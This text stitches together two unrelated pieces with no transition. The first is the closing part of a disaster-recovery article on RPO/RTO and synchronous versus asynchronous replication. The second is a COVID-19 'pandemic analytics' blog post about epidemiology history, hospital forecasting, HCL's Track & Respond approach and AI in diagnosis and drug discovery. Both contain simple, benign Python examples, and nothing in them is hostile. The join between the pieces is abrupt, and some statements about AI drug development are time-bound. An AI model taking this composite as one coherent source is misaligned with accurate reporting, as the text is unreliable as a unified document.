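These two metrics lend themselves to a simple screening calculation: a strategy qualifies only if its worst-case data loss fits the RPO and its worst-case recovery time fits the RTO. The strategy figures below are hypothetical placeholders, not vendor numbers.

```python
def meets_objectives(strategy, rpo_minutes, rto_minutes):
    """A strategy qualifies when worst-case data loss fits the RPO and
    worst-case recovery time fits the RTO."""
    return (strategy["max_data_loss_min"] <= rpo_minutes
            and strategy["recovery_time_min"] <= rto_minutes)

strategies = {
    "nightly tape":       {"max_data_loss_min": 24 * 60, "recovery_time_min": 48 * 60},
    "async replication":  {"max_data_loss_min": 15,      "recovery_time_min": 60},
    "sync replicated DC": {"max_data_loss_min": 0,       "recovery_time_min": 5},
}

# Target: lose at most 15 minutes of data, be back online within 2 hours.
viable = sorted(name for name, s in strategies.items()
                if meets_objectives(s, rpo_minutes=15, rto_minutes=120))
```

In practice, cost enters the decision too — the strategies that satisfy tight objectives sit at the expensive end of the continuum described next.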
Based upon the RPO and RTO, businesses should use the System Protection Continuum to determine the solution that will meet their disaster recovery needs. It is a way to visualize the protection offered by different data protection strategies. On one end are strategies such as on-site tape and cold sites; they offer slower recovery times and some data may never be recovered. On the other end are strategies that ensure zero data loss and near instantaneous recovery times. This includes strategies such as synchronous replicated data centers.
There are two fundamental types of replication: synchronous and asynchronous. Synchronous replication is used to achieve zero data loss and near-zero downtime; the common hurdles businesses must overcome are bandwidth availability, network latency, and distance limitations. Asynchronous replication acknowledges writes before they reach the replica and ships the data afterward. While this overcomes the bandwidth, latency, and distance issues, the replication lag negatively affects RPO and, depending on the recovery process, RTO.
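The trade-off can be sketched with a toy in-memory primary/replica pair. The class below is illustrative only and stands in for real storage replication; the `flush()` call models the replica catching up later.

```python
class Replicator:
    """Toy primary/replica pair illustrating the sync vs. async trade-off."""

    def __init__(self, synchronous):
        self.synchronous = synchronous
        self.primary, self.replica, self.pending = [], [], []

    def write(self, record):
        self.primary.append(record)
        if self.synchronous:
            # The write is not acknowledged until the replica has it:
            # zero data loss, but every write pays the round-trip latency.
            self.replica.append(record)
        else:
            # Acknowledge immediately and ship the record later; anything
            # still pending is lost if the primary fails now (RPO > 0).
            self.pending.append(record)

    def flush(self):
        """Replica catches up on the backlog (the asynchronous lag)."""
        self.replica.extend(self.pending)
        self.pending.clear()

sync_pair = Replicator(synchronous=True)
sync_pair.write("order-1")
async_pair = Replicator(synchronous=False)
async_pair.write("order-1")
print(sync_pair.replica, async_pair.replica)  # ['order-1'] [] — the async replica lags
```

A primary failure between `write()` and `flush()` is exactly the data-loss window that makes asynchronous replication cheaper but weaker on RPO.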
About the author: Jacob Baker explains the essential facts about disaster recovery services that are critical for keeping businesses running after system failures.
As society grapples with the public health and economic challenges manifesting in COVID-19’s wake, businesses rushing to realign themselves to this new reality are looking to technology to help. Data analytics in particular is proving to be an ally for epidemiologists, as they join forces with data scientists to address the scale of the crisis.
The spread of COVID-19 and the public’s desire for information has sparked the creation of open-source data sets and visualizations, paving the way for a discipline we’ll introduce as pandemic analytics. Analytics is the aggregation and examination of data from many sources to derive insights, and when used to study and fight global outbreaks, pandemic analytics is a modern way to combat a problem as old as humanity itself: the proliferation of disease.
Here are three ways pandemic analytics are helping us get through the COVID-19 crisis:
1 – To Craft the Right Response
In the early 1850s, as London battled a rampant rise in the number of cholera cases, John Snow – the founder of modern epidemiology – noticed cluster patterns of cholera cases around water pumps. This discovery allowed scientists to leverage data to combat pandemics for the first time, driving their efforts towards quantifying the risk, identifying the enemy, and devising an appropriate response strategy.
That early flash of genius has since advanced, and 170 years of cumulative intelligence have proven that early interventions disrupt the spread of disease. However, analysis, decision-making, and the interventions that follow can only be effective when they first take into consideration all accessible, meaningful data points.
At Sheba Medical Center in Israel, healthcare administrators are using data-driven forecasting to optimize allocation of personnel and resources in advance of potential local outbreaks. These solutions are powered by machine learning algorithms that offer predictive insights based on all accessible data about the spread of the disease, such as confirmed cases, deaths, test results, contact tracing, population density, demographics, migration flow, availability of medical resources, and pharma stockpiles.
Viral spread has a small silver lining: the exponential creation of new data which we can learn from and act upon. With the right analytics capabilities, healthcare professionals can answer questions such as where the next cluster is most likely to arise, which demographic is most susceptible, and how the virus may mutate over time.
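The forecasting models described above are proprietary, so as a hedged stand-in, the sketch below fits a simple exponential growth curve to a short, invented series of daily case counts and projects it forward. This is the kind of naive baseline a real pipeline would refine with the richer data sources listed above (contact tracing, demographics, migration flow, and so on).

```python
import math

def fit_exponential(cases):
    """Least-squares fit of log(cases) = a + b*t; b is the daily growth rate."""
    n = len(cases)
    days = range(n)
    logs = [math.log(c) for c in cases]
    mean_t = sum(days) / n
    mean_y = sum(logs) / n
    b = sum((t - mean_t) * (y - mean_y) for t, y in zip(days, logs)) / \
        sum((t - mean_t) ** 2 for t in days)
    a = mean_y - b * mean_t
    return a, b

def forecast(cases, days_ahead):
    """Project the fitted curve `days_ahead` days past the last observation."""
    a, b = fit_exponential(cases)
    t = len(cases) - 1 + days_ahead
    return math.exp(a + b * t)

# Hypothetical confirmed-case counts for one region, one value per day.
cases = [10, 13, 18, 24, 33, 44, 60]
print(round(forecast(cases, 3)))  # projected cases three days out
```

Real epidemic curves are not exponential forever, which is precisely why production models fold in interventions, susceptible-population depletion, and the other signals the text describes.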
2 – To See the Unseeable
The accessibility of data from trusted sources has led to unprecedented sharing of visualizations and messages to educate the public. Take for example the dynamic world map created by Johns Hopkins’ Center for Systems Science and Engineering, and these brilliantly simple yet enlightening animations from the Washington Post. Such visualizations are quickly teaching the public about how viruses spread, and which individual actions can help or hinder that spread. The democratization of data and analytics tools, combined with mass ability to share information via the internet, has allowed us to witness the impressive power of data used for good.
In recent months, companies have brought pandemic data gathering in-house to develop their own proprietary intelligence. Some of the more enterprising companies have even set up internal Track & Respond Command Centers to guide their employees, customers and broader partner ecosystem through the current crisis.
HCL realized early in the outbreak that it would need its own command center dedicated to COVID-19 response. Coordinated by senior leadership, it gives HCL data scientists the autonomy to develop creative, pragmatic insights for more informed decision-making, such as predictive analytics on the potential impact to HCL's customers and the markets where HCL serves them.
With the goal of enabling leadership to respond quickly throughout the development of the COVID situation, we employed techniques such as statistics, control theory, simulation modeling and Natural Language Processing (NLP). For simplicity, we’ll categorize our approach under the Track & Respond umbrella:
- TRACK the situation quantitatively and qualitatively to understand its magnitude.
- Perform topic modeling in real time across thousands of publications from international health agencies and credible news outlets; automate the extraction of quantifiable trends (alerts) and actionable information relevant to a manager's role and responsibilities.
- Create forecasts that directionally track and predict when regions critical to HCL and its customers will reach peak infection and, conversely, a rising recovery rate.
- RESPOND using a mathematical model of the situation as a proxy for the actual pandemic.
- Create a multi-dimensional simulation model using robust and contextual variables to produce a meaningful prediction customized to the leader using it.
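HCL's simulation models are not public; a minimal stand-in for the "simulation modeling" step above is the classic SIR compartmental model, sketched below with invented parameters. It shows the kind of directional answer such a model gives: lowering the contact rate delays and flattens the infection peak.

```python
def sir_step(s, i, r, beta, gamma, dt=1.0):
    """One Euler step of the classic SIR compartmental model.

    s, i, r are population fractions; beta is the contact/transmission
    rate per day, gamma the recovery rate per day.
    """
    new_infections = beta * s * i
    new_recoveries = gamma * i
    return (s - new_infections * dt,
            i + (new_infections - new_recoveries) * dt,
            r + new_recoveries * dt)

def simulate(beta, gamma, days, i0=0.001):
    """Run the model and return (day of infection peak, peak fraction infected)."""
    s, i, r = 1.0 - i0, i0, 0.0
    peak_day, peak_i = 0, i
    for day in range(1, days + 1):
        s, i, r = sir_step(s, i, r, beta, gamma)
        if i > peak_i:
            peak_day, peak_i = day, i
    return peak_day, peak_i

# Hypothetical parameters: an intervention (distancing) lowers beta.
baseline = simulate(beta=0.35, gamma=0.1, days=200)
distanced = simulate(beta=0.20, gamma=0.1, days=200)
print(baseline, distanced)  # distancing delays and lowers the infection peak
```

A production "Track & Respond" model would replace these toy constants with region-specific, data-driven estimates and far more compartments, but the mechanism, simulating interventions before committing to them, is the same.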
3 – To Diagnose, Treat, and Cure
On December 21, 2019, an AI system operated by a Toronto-based startup called BlueDot detected the earliest anomalies relating to what was then considered a mysterious pneumonia strain in Wuhan. The AI system accessed over one million articles in 65 languages to detect a similarity to the 2003 SARS outbreak. It was only nine days later that the WHO alerted the wider public about the emergence of this new danger.
Developing healthcare solutions is a challenge of working with data at scale, and this is where AI can play a crucial role. AI has already been deployed to help diagnose the coronavirus through imaging analysis, cutting the time to read CT scan results from about five minutes to twenty seconds. Through automation, AI can not only help cope with rising diagnostic workloads but also free up valuable resources to focus on treating patients.
AI and ML can also be used to speed up the pharmaceutical development process. So far, only one AI-developed drug has reached human clinical trials. But even that solitary success is extremely impressive as the technology was able to expedite a process that typically takes years.
It’s quite possible that AI in conjunction with medical researchers can help reduce drug development timelines to mere months or weeks. With the world still in urgent need of a COVID-19 vaccine months after the first reported death, this human-machine synergy in the pharmaceutical space is the need of the hour.
Where We Go from Here
As the world braces itself for the impact of the COVID-19 outbreak, it is important to remember that technology is nothing but the cumulative innovation of humanity over time, and in technology we have the tools necessary to help us survive and protect ourselves. We do not know what lies in store for us in the coming weeks and months, but we will face it together, and our greatest strength will be in how we share, analyze, and derive insights from our shared knowledge.
With the right technology applied in the right direction, we have the potential to contain disease and minimize its impact, today and in the future.
This blog was also published in ETHealthworld.com.